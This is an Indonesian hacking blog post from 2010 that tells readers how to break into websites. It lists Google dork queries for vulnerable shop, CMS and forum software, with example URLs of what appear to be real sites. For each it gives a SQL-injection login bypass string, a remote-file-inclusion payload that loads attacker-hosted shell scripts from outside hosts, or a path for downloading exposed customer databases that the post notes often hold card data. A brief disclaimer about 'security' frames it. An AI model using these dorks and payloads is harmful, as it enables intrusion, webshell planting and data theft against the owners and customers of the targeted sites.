Selasa, 23 Februari 2010

HACK SITE DENGAN INJEK SQL

Wow klo yang nge bahas ini kayaknya ngga ada abisnya soalnya uptodate tiap menit bahkan detik siapa tuh yang update yahh para hacker didunia ini.trus penulis disini TIDAK bertanggung jawab atas apa yang telah dilakukan oleh Pelakunya penulis hanya sekedar menulis untuk kepentingan SECURITY(bahasa Gaulnya). NGGA BERTANGGUNG JAWAB ATAS PENYALAHGUNAAN TULISAN INI.titik

Pembahasan:

------------------------------------------------
keyword:inurl:"/cart.php?m="
contoh:http://www.facesbyfelicia.com/store/cart.php?m=view
ganti tulisn cart.php?m=view dengan admin
jadi http://www.facesbyfelicia.com/store/admin
trus login pake sql username : 'or"=" password :'or"="
------------------------------------------------
keyword inurl:"/modernbill"
contoh:http://billing.ourweb.net/modernbill/
masukin injekannya:include/html/config.php?DIR=http://one-server.us/injek.txt?
jadi:http://billing.ourweb.net/modernbill/include/html/config.php?DIR=http://one-server.us/injek.txt?
------------------------------------------------
keyword:"Powered by SunShop 3.2" atau: inurl:"/sunshop/index.php?action="
contoh http://www.dohertysgym.com/sunshop/index.php
ganti kata index.php dengan admin jadi : http://www.dohertysgym.com/sunshop/admin
login pake user: admin pass: 'or''='
------------------------------------------------
inurl:"modules.php?name=SQuery"
injek:SQuery/lib/gore.php?libpath=http://one-server.us/item.txt?
contoh:http://www.dies-world.com/SQuery/lib/gore.php?libpath=http://one-server.us/item.txt?
------------------------------------------------
google:allinurl:com_galleria
injek:components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://one-server.us/item.txt?
contoh:http://www.a1gpracing.net/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://coffee-pot.info/injek.txt?
------------------------------------------------
google:allinurl:"/auth/lostPassword.php"
contoh:http://www.kbsbrig.ch/claroline/claroline/auth/lostPassword.php
injek:ldap/authldap.php?includePath=http://one-server.us/item.txt?
jadi:http://www.kbsbrig.ch/claroline/claroline/auth/ldap/authldap.php?includePath=http://one-server.us/item.txt
------------------------------------------------
google:intitle:"Multimedia Flash Website Builder"
contoh:www.webdesignhq.com/sitebuilder/index.php
injek:sitebuilder/admin/top.php?admindir=http://one-server.us/item.txt?
jadi:www.webdesignhq.com/sitebuilder/admin/top.php?admindir=http://one-server.us/item.txt?
------------------------------------------------
gogle:"software 2004-2005 by randshop"
contoh:http://www.dieterkropp.com/shop/themes/kategorie/index.php?id=20&katid=32&action=detail
injek:includes/header.inc.php?dateiPfad=http://one-server.us/item.txt?
jadi:http://www.dieterkropp.com/shop/includes/header.inc.php?dateiPfad=http://one-server.us/item.txt?
------------------------------------------------
keyword;"powered by geeklog"
contoh:http://www.kobe-ch.com/index.php
injek:plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://geocities.com/shella_kapas/kek.jpg?
jadi:http://www.kobe-ch.com/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://geocities.com/shella_kapas/kek.jpg?
------------------------------------------------
google:inurl:"/product.php?printable=" atau "powered by x-cart"
inurl:"/home.php?printable=" ganti tulisan itu semua dengan admin
kekekek biasa sqlnya cari sendiri ya
------------------------------------------------
keyword:inurl:"/index. php?option=com_rsgallery"
bug:components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://elang13.org/item,txt?
contoh:http://www.pass-my-shotgun.co.uk/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://elang13.org/item.txt?
------------------------------------------------
keyword:"Advanced Poll" inurl:/admin/
contoh:http://www.kgcshop.or.kr/shop/admin/poll/admin/index.php
bug:common.inc.php?base_path=http://elang13.org/item.txt?
jadi:http://www.kgcshop.or.kr/shop/admin/poll/admin/common.inc.php?base_path=http://elang13.org/item.txt?
------------------------------------------------
inurl:"powered by cs-cart"
injek:classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://elang13.org/item/txt?
------------------------------------------------
inurl:"/catalogue.php?cat="
ganti tulisan catalogue.php?cat= dengan admin selanjutnya tguas ente ente sekalian nyari sqlnya hak hak hak

inurl:"/DoceboScs" injek:doceboScs/lib/lib.teleskill.php?GLOBALS[where_scs]=http://elang13.org/hitam.txt?
inurl:"/DoceboCore" injek:doceboCore/lib/lib.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
inurl:"/DoceboLms" injek:doceboLms/lib/lib.repo.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
inurl:"/DoceboKms" injek:doceboKms/modules/documents/lib.filelist.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
inurl:"/DoceboCMS" injek:docebocms/lib/lib.simplesel.php?GLOBALS[where_framework]=http://elang13.org/hitam.txt?
------------------------------------------------
allinurl:"dload.php"
injekan:pafiledb/includes/pafiledb_constants.php?module_root_path=http://elang13.org/hitam.txt?
------------------------------------------------
"powered by squirrelcart"
injek : squirrelcart/cart_content.php?cart_isp_root=
------------------------------------------------
keyword inurl:/ubbthreads/
injek:addpost_newpoll.php?addpoll=preview&thispath=http://elang13.org/hitam.txt?
------------------------------------------------
allinurl:"index.php?target=categories"
injek:classes/phpmailer/class.cs_phpmailer.php?classes_dir=http://elang13.org/item.txt?
------------------------------------------------
google : "Exhibit Engine 1.5 RC 4"
injek:photo_comment.php?toroot=http://elang13.org/item.txt?
------------------------------------------------
inurl:"/modules/Forums/
injek:admin/admin_users.php?phpbb_root_path=http://elang13.org/item.txt?
------------------------------------------------
allinurl: includes/include_once.php
bug:includes/include_once.php?include_file=http://elang13.org/item.txt?
------------------------------------------------
allinurl:/phplivehelper/blank.php
injek:initiate.php?abs_path=hhttp://elang13.org/item.txt?
------------------------------------------------
google:"powered by DreamAccount"
injeknya:
auth.cookie.inc.php?da_path=http://elang13.org/item.txt?
auth.header.inc.php?da_path=http://elang13.org/item.txt?
auth.sessions.inc.php?da_path=http://elang13.org/item.txt?
------------------------------------------------
ashopKart20/" ganti tulisan yang ada didepannya ama admin/scart.mdb
------------------------------------------------
inurl:"//comersus/" ganti /store/xxxx.asp dengan
database/comersus.mdb
------------------------------------------------
allinurl:/shop/category.asp/catid=
hapus tuisan /shop/category.asp?catid=2 ganti dengan /admin/dbsetup.asp liat file mdbnya donlot uka pake microsoft acsses ccnya biasayanya di encrypt
http://rossm.net/Electronics/Computers/Software/ASP/RC4.asp
------------------------------------------------
inurl:"/admin/default.asp"
username:admin password:'or''='
span style="color: rgb(51, 51, 255);">------------------------------------------------
inurl:"/metacart/"
injek : database/metacart.mdb
------------------------------------------------
inurl:"/store/proddetail.asp?prod="
ganti tulisan proddetail.asp?prod= dengan fpdb/vsproducts.mdb
------------------------------------------------
inurl:"/AdminLogin.asp"
login pake sql ini :
usename:1'or'1'='1
password:1'or'1'='1
------------------------------------------------
inurl:"com_a6mambocredits"
http://www.targer.com/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://Senjata.com/tembuspakeshell.txt
------------------------------------------------
"Welcome to phpMyAdmin" inurl:main.php
------------------------------------------------
filetype:sql ("passwd values ****" | "password values ****" | "pass values ****" )
------------------------------------------------
inurl:"com_peoplebook"
inurl:"com_comprofiler"

Tidak ada komentar:

Poskan Komentar

SILAHKAN KOMENTARI POSTINGAN INI